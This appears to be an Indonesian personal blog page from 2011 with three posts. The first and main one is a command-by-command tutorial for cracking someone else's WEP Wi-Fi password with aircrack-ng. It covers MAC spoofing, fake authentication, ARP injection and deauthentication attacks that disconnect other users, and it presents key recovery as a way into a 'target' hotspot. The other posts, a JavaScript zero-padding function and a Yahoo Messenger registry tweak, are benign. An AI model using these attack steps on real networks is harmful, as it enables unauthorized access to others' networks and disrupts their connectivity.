Jumat, 21 Januari 2011

Teknik Menjebol Password Hotspot WEP

Hardware yg digunakan
- USB Wi-Fi adapter merk Linksys

Software yg digunakan
- Ubuntu 10.10
- Aircrack-ng
- Terminal / Konsole

TUTORIAL

Install aircrack-ng:

$ sudo apt-get install aircrack-ng

Pastikan USB Wi-Fi sudah tertancap di komputer.
Periksa interface wifi:

$ ifconfig

Misalnya nama interface adalah wlan0.
Non-aktifkan interface wifi wlan0:

$ airmon-ng stop wlan0
$ ifconfig wlan0 down
$ macchanger --mac 00:11:22:33:44:55 wlan0

Perintah macchanger ini optional, digunakan utk mengubah mac address adapter wifi (spoofing). Jika tidak ingin mengganti mac address, gunakan mac address asli adapter wifi.
Mac address wlan0 bisa dilihat dengan menjalankan perintah 'ifconfig'.

Setelah kita mengetahui mac address di atas, jalankan perintah utk mengubah status wifi menjadi monitor mode:

$ airmon-ng start wlan0

Kemudian akan muncul keluaran seperti berikut ini:

Interface Chipset Driver
wlan0 Intel 4965 a/b/g/n iwl4965 - [phy0]
(monitor mode enabled on mon0)

Untuk selanjutnya akan dipakai mon0 sebagai interface menggantikan wlan0.
Jalankan perintah berikut utk menampilkan daftar akses poin terdekat:

$ airodump-ng mon0














Yang perlu diperhatikan adalah kolom berikut,

BSSID = mac address akses poin target
PWR = kekuatan sinyal, semakin kecil nilainya semakin dekat jarak akses poin (sinyal kuat)
#Data = banyaknya lalu lintas data yg sedang terjadi
CH = channel yg digunakan
ENC = jenis enskripsi akses poin. pilih yg menggunakan WEP.
ESSID = nama akses poin
STATION = mac address komputer yg sedang terhubung

Selanjutnya kita akan memonitor lalu lintas data di salah satu akses poin.
Misalnya kita target akses poin "yoyo".
Buka aplikasi terminal / konsole, dan jalankan perintah monitor berikut:

$ airodump-ng -c 3 -w hasilmonitor --bssid 99:88:77:66:55:44 mon0







Parameter "-c 3" menunjukkan bahwa akses poin 99:88:77:66:55:44 menggunakan channel 3.
Parameter "-w hasilmonitor" menunjukkan nama file hasil rekaman data.

Biarkan terminal monitor ini berjalan.
Kita buka satu lagi terminal baru, untuk melakukan fake authenticate bssid.

$ aireplay-ng -1 0 -a 99:88:77:66:55:44 -h 00:11:22:33:44:55 -e yoyo mon0

Pastikan hasilnya berupa pesan Association successful.
Jika tidak sukses, ganti target akses poin yg lain.

Kemudian jalankan perintah berikut utk melakukan arp inject.

$ aireplay-ng -3 -b 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0

Arp inject ini bertujuan utk mempercepat lalu lintas data yg terjadi pada akses poin target, sehingga kita dapat mengumpulkan cukup banyak data yg akan kita crack nantinya.
Arp inject ini membuat paket baca/tulis yg sangat cepat yg memungkinkan komputer lain yg sedang terhubung ke akses poin tersebut tidak bisa melakukan akses internet (diskonek).
Jika arp inject ini dilakukan dengan frekuensi yg sering, bisa saja membuat pemilik akses poin curiga bahwa ada oknum yg sedang melakukan penyerangan.

Ada cara lain yg lebih sadis yaitu dengan cara deauth attack. Dengan menggunakan deauth attack, kita memaksa komputer yg sedang terhubung ke akses poin utk putus / diskonek. Dan jika suatu komputer terputus dari akses poin, maka komputer tersebut otomatis akan berusaha tersambung kembali dengan akses poinnya. Kegiatan putus-sambung yg berulang kali ini akan membuat lalu lintas data menjadi bertambah, yg bisa kita rekam di aplikasi monitor kita sebelumnya. Perintahnya:

$ aireplay-ng --deauth 0 -a aa:bb:cc:dd:ee:ff mon0

Mac address aa:bb:cc:dd:ee:ff adalah milik komputer client yg sedang terhubung ke akses poin. Mac address komputer client ini terlihat pada terminal saat kita menampilkan daftar akses poin, yaitu pada kolom STATION.

Data (dinamakan data IV = Initialization Vector) yg diperlukan utk melakukan crack keamanan WEP minimal berjumlah 10.000. Jika kolom #Data yg terlihat di terminal monitor sudah mencapai sekitar angka 10.000 (semakin banyak semakin akurat), kita sudah bisa hentikan proses monitoring data.

Kemudian kita lakukan crack file hasil monitor data tersebut.

$ aircrack-ng -b 99:88:77:66:55:44 hasilmonitor.cap

Kemudian akan muncul keluaran: KEY FOUND [ 5F:81:BD:13:1F ]

Kita gunakan hasil tersebut sebagai password WEP dengan menghilangkan tanda titik dua, sehingga menjadi: 5F81BD131F.







Kamis, 20 Januari 2011

Pad Number with Leading Zero in Javascript

The following function will pad number with leading zero(es).

function pad(number, length) {
   var str = '' + number;
   while (str.length < length) {
   str = '0' + str;
   }
   return str;
} 
 
Some code to test the function:

document.write(pad(1, 1) + '');
document.write(pad(1, 2) + '');
document.write(pad(15, 2) + '');
document.write(pad(1, 3) + '');
document.write(pad(15, 3) + '');
document.write(pad(155, 3) + '');
document.write(pad(1, 4) + '');
document.write(pad(1, 5) + ''); 
 
And the result output:

1
01
15
001
015
155
0001
00001

http://www.electrictoolbox.com/pad-number-zeroes-javascript/

Jumat, 14 Januari 2011

Login Multiple Yahoo Messenger



There's a registry hack to enable multiple login for Yahoo Messenger.

1. Start => Run => regedit
2. Go to HKEY_CURRENT_USER => Software => Yahoo => Pager => Test
3. On the right window, right click => New => DWORD => type in Plural
4. Type in decimal value: 1
5. Close registry and run multiple Yahoo Messenger login.